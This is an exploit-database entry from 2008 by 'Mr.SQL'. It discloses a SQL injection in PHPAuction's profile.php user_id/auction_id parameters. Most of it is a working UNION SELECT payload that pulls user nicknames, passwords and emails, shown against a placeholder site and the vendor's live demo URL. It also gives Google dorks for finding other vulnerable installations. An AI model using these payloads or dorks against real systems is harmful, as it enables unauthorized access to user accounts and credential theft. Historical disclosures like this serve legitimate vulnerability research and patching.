phpAuction - 'profile.php' SQL Injection (1)

EDB-ID:

5879


Author:

Mr.SQL

Type:

webapps


Platform:

PHP

Date:

2008-06-20


#########################################################################
#################### Viva IslaM Viva IslaM ##############################
##
## Remote SQL Injection Vulnerability
##
## PHPAuction ( profile.php user_id )
##
#########################################################################
#########################################################################
##
## AuTh0r : Mr.SQL
##
## H0ME   : WwW.PaL-HaCkEr.CoM  &  WwW.ATsDp.CoM
##
## Email  : SQL@Hotmail.it
##
## !! SYRIAN HaCkErS  !!
########################
########################
##
## Script  : PHPAuction
##
## site    : www.phpauctions.info
##
########################
########################
##
## D0rk1 : allinurl: "profile.php?user_id" auction_id
##
## D0rk2 : allinurl: "active_auctions.php" user_id
##
##     -(:: SQL ::)-
##
##    www.site.com/
##         profile.php?user_id=1&auction_id=-2+union+select+concat_ws(0x2F2A2A2F,nick,password,email)+from+PHPAUCTION_users+limit+1,1/*
##
##  -(:: L!VE DEMO ::)-
##
##    http://phpauctions.info/phpauction/demo/profile.php?user_id=1&auction_id=-2+union+select+concat_ws(0x2F2A2A2F,nick,password,email)+from+PHPAUCTION_users+limit+1,1/*
##
##    http://phpauctions.info/phpauction/demo/viewfaqs.php?cat=null
#######################
#######################
 -(:: Note ::)-
This script not >> (( phpAuction GPL ))  (( password Md5 ))

#######################################################################################################
#######################################################################################################

                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
                                         
 :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MuslimS HaCkErS ::
#######################################################################################################
#######################################################################################################

# milw0rm.com [2008-06-20]